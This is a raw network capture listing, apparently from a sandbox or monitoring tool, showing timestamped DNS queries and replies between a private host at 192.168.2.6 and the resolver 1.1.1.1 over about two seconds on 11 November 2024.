Nov 11, 2024 18:13:22.556025982 CET	53	54807	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.556221962 CET	53	61792	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.557035923 CET	53	50174	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.557390928 CET	53	57028	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.557707071 CET	53	64701	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.561007977 CET	53	50163	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.562462091 CET	62032	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.563862085 CET	53	64603	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.563996077 CET	53	55978	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.565192938 CET	53	61736	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.571997881 CET	53	60613	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.572665930 CET	53	62032	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.575990915 CET	53	60118	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.578619003 CET	53	56281	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.581590891 CET	60289	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.586623907 CET	54633	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.586875916 CET	55733	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:22.591330051 CET	53	60289	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.596040964 CET	53	55733	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.596061945 CET	53	54633	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:22.727392912 CET	53	50416	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.331721067 CET	53674	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.334357023 CET	60285	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.335275888 CET	54625	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.335540056 CET	59267	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.337018967 CET	57162	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.344611883 CET	53	60285	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.345980883 CET	62507	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.347166061 CET	53	57162	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.347470045 CET	53	59267	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.352008104 CET	59753	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.355875969 CET	53	54625	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.356985092 CET	55950	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.357126951 CET	55083	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.357640982 CET	62267	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.362227917 CET	53	59753	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.365264893 CET	53	53674	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.367163897 CET	58648	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.367264986 CET	53	55083	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.368726015 CET	63349	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.368843079 CET	57608	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.375878096 CET	58784	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.376265049 CET	55089	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.376566887 CET	53	55950	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.377367020 CET	53	62507	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.378181934 CET	53	58648	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.380959988 CET	53	57608	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.384516954 CET	53037	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.387126923 CET	53	63349	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.389705896 CET	55952	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.389961004 CET	53	62267	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.394072056 CET	53	58784	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.398964882 CET	54002	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.400415897 CET	53778	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.400742054 CET	50241	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.400760889 CET	53	55952	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.400926113 CET	50245	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.401094913 CET	58183	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.406253099 CET	63418	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.406253099 CET	54603	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.406503916 CET	58210	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.406653881 CET	65218	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.406697989 CET	56670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.406723022 CET	60168	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.406904936 CET	56132	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.408274889 CET	53	55089	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.411210060 CET	53	50241	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.411233902 CET	53	53778	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.414000988 CET	53	54002	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.416166067 CET	53	53037	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.416234970 CET	53	54603	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.417365074 CET	53	58210	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.417437077 CET	53	63418	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.417833090 CET	53	60168	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.425992966 CET	53	56132	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.432012081 CET	53	50245	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.433995008 CET	53	58183	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.438604116 CET	53	65218	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.438865900 CET	53	56670	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.459834099 CET	62530	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.461818933 CET	62300	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.462519884 CET	56913	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.462861061 CET	54594	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.463093996 CET	64867	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.463407040 CET	59680	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.465440989 CET	59222	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.471910954 CET	53	62530	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.475605011 CET	53	59680	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.475704908 CET	53	54594	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.479721069 CET	62465	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480014086 CET	61808	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480221987 CET	62043	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480267048 CET	57072	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480458975 CET	61515	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480643988 CET	51178	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480643988 CET	49627	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480664968 CET	55122	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480874062 CET	58138	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.480874062 CET	62472	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481028080 CET	54124	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481081963 CET	56836	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481209040 CET	64541	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481273890 CET	52550	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481410980 CET	62862	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481456995 CET	62195	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481594086 CET	52328	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481681108 CET	58491	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.481762886 CET	53050	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.485035896 CET	53009	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.487504959 CET	54251	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.487771034 CET	58535	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.487945080 CET	65051	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.489305973 CET	53258	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.489553928 CET	53	61808	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.489953995 CET	53	57072	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.490190029 CET	55191	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.490494013 CET	53	61515	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.490791082 CET	53	51178	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.490803957 CET	53	58138	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.491113901 CET	49261	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.491192102 CET	53	55122	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.491468906 CET	53	62472	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.491482019 CET	53	54124	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.491494894 CET	53	64541	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.491513014 CET	53	58491	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.491759062 CET	53	52550	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.491934061 CET	53	62862	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.492178917 CET	53	53050	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.492417097 CET	59319	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.492417097 CET	61168	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.492511988 CET	53	56836	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.492677927 CET	53	62300	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.492808104 CET	53	52328	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.493463993 CET	53	56913	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.494076967 CET	53	53009	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.494908094 CET	53	65051	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.495903015 CET	53	64867	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.497052908 CET	53	58535	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.497939110 CET	53	59222	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.498958111 CET	53	62043	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.501844883 CET	53	49261	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.502300978 CET	53	59319	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.503083944 CET	53	61168	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.510977983 CET	53	62465	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.511764050 CET	53	49627	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.513237000 CET	53	62195	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.520126104 CET	53	54251	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.521851063 CET	53	53258	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.521862984 CET	53	55191	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.602587938 CET	53	60108	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:23.993072987 CET	60427	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.995398998 CET	55364	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.996541977 CET	50947	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.996728897 CET	53147	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:23.997545004 CET	58474	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.001290083 CET	54228	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.006005049 CET	53	55364	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.010194063 CET	53	58474	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.010629892 CET	53	54228	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.019299984 CET	60916	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.019475937 CET	65086	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.019608021 CET	62153	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.025182009 CET	53	60427	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.027214050 CET	53	50947	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.027487993 CET	53	53147	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.029839039 CET	53	65086	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.031019926 CET	53	62153	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.031068087 CET	65104	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.031466007 CET	53547	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.040637016 CET	53	65104	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.040940046 CET	57988	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.041786909 CET	53	53547	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.047615051 CET	54527	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.047782898 CET	52108	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.047957897 CET	56350	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.048141003 CET	65390	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.048532963 CET	58512	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.049130917 CET	49458	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.049990892 CET	57991	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.050559998 CET	53	60916	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.050966024 CET	53	57988	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.053244114 CET	52882	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.053286076 CET	54172	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.053908110 CET	59846	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.054091930 CET	57246	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.055166960 CET	49958	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.057480097 CET	53	54527	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.058725119 CET	53	56350	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.059501886 CET	53	57991	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.063960075 CET	53	54172	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.065259933 CET	58557	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.065427065 CET	63387	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.065562963 CET	54559	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.065689087 CET	52985	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.067270994 CET	53	57246	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.069307089 CET	54926	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.069528103 CET	60092	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.070024014 CET	64159	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.070595980 CET	62029	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.070928097 CET	61723	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.071105003 CET	63222	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.071130991 CET	58917	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.071434975 CET	59622	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.071600914 CET	59577	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.071619987 CET	59112	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.071773052 CET	64455	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.071963072 CET	62533	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.072037935 CET	62075	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.072139025 CET	62729	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.072237968 CET	58104	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.072560072 CET	57683	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.073503971 CET	53	52882	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.073774099 CET	53	49958	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.075752974 CET	53	58557	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.077066898 CET	61084	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.077099085 CET	63651	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.077290058 CET	65295	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.077455044 CET	58681	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.078195095 CET	63907	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.078632116 CET	53	54926	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.079226971 CET	53	65390	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.079935074 CET	53	64159	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.079947948 CET	53	49458	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.080070019 CET	53	52108	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.080240965 CET	53	60092	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.080252886 CET	53	62029	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.080879927 CET	53	58512	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.082138062 CET	53	64455	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.082501888 CET	53	57683	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.082514048 CET	53	62533	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.082943916 CET	53	62075	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.082956076 CET	53	59622	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.083508968 CET	53	61723	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.083719969 CET	53	63387	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.084719896 CET	53	59846	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.087094069 CET	53	65295	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.087105036 CET	53	63651	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.087383032 CET	53	61084	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.088143110 CET	53	63907	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.089390993 CET	53	58917	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.091228962 CET	61574	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.092242956 CET	64681	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.093276978 CET	64016	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.094023943 CET	54145	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.094507933 CET	63033	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.094858885 CET	60174	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.095326900 CET	63905	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.095732927 CET	63981	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.096141100 CET	61286	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.096286058 CET	49698	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.096904039 CET	53	54559	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.097125053 CET	53698	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.097140074 CET	53	52985	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.101762056 CET	53	63222	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.101893902 CET	53	64016	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.102504015 CET	53	61574	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.102742910 CET	53	59112	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.103481054 CET	53	62729	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.103497982 CET	53	59577	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.104176044 CET	53	58104	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.106076002 CET	53	63981	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.106627941 CET	53	63033	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.106646061 CET	53	49698	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.107695103 CET	53	61286	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.110003948 CET	53	58681	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.122879028 CET	49632	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.123552084 CET	56487	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.124219894 CET	61229	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.124491930 CET	53	64681	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.124783039 CET	64703	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.126101017 CET	53	54145	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.127789021 CET	53	63905	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.127985001 CET	53	60174	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.128516912 CET	53	53698	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.132668972 CET	53	49632	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.135754108 CET	53	56487	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.136796951 CET	53	64703	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.155124903 CET	53	61229	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.306117058 CET	57334	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.316440105 CET	53	57334	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.352463961 CET	59414	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.352889061 CET	64806	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.353147984 CET	55758	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.353780031 CET	60072	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.361932039 CET	53	59414	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.363503933 CET	53	64806	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.364428043 CET	57533	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.366138935 CET	53	60072	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.374419928 CET	53	57533	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.384500027 CET	53	55758	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.429524899 CET	65399	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.430450916 CET	57469	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.438030958 CET	53	57469	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.439718962 CET	53	65399	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.451035023 CET	63380	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.461639881 CET	53	63380	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.492595911 CET	50008	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.501416922 CET	53	50008	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.544589996 CET	52999	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.556915998 CET	53	52999	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.577333927 CET	59156	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.577605009 CET	60952	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.577912092 CET	51785	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.578099966 CET	53588	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.578514099 CET	64430	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.578824043 CET	52685	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.579011917 CET	63042	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.579291105 CET	63893	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.579472065 CET	55558	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.579946995 CET	65019	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.580118895 CET	52194	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.584762096 CET	52389	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.584822893 CET	53	59156	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.584958076 CET	56500	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.585444927 CET	64892	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.586327076 CET	52587	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.588254929 CET	53	64430	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.589390993 CET	53	51785	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.589658976 CET	53	52685	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.589958906 CET	53	63042	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.590090036 CET	53	65019	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.594120979 CET	53	52389	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.595376015 CET	53	64892	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.596271038 CET	53	56500	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.600322962 CET	55965	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.600658894 CET	58279	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.601269007 CET	55478	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.601499081 CET	50777	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.601644039 CET	51214	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.602631092 CET	49546	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.608033895 CET	49427	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.608212948 CET	53152	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.608371019 CET	53	60952	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.608509064 CET	55570	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.608972073 CET	61018	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.609133959 CET	49815	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:24.609164000 CET	53	50777	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.610882998 CET	53	53588	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.611550093 CET	53	63893	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:24.611807108 CET	53	52194	1.1.1.1	192.168.2.6
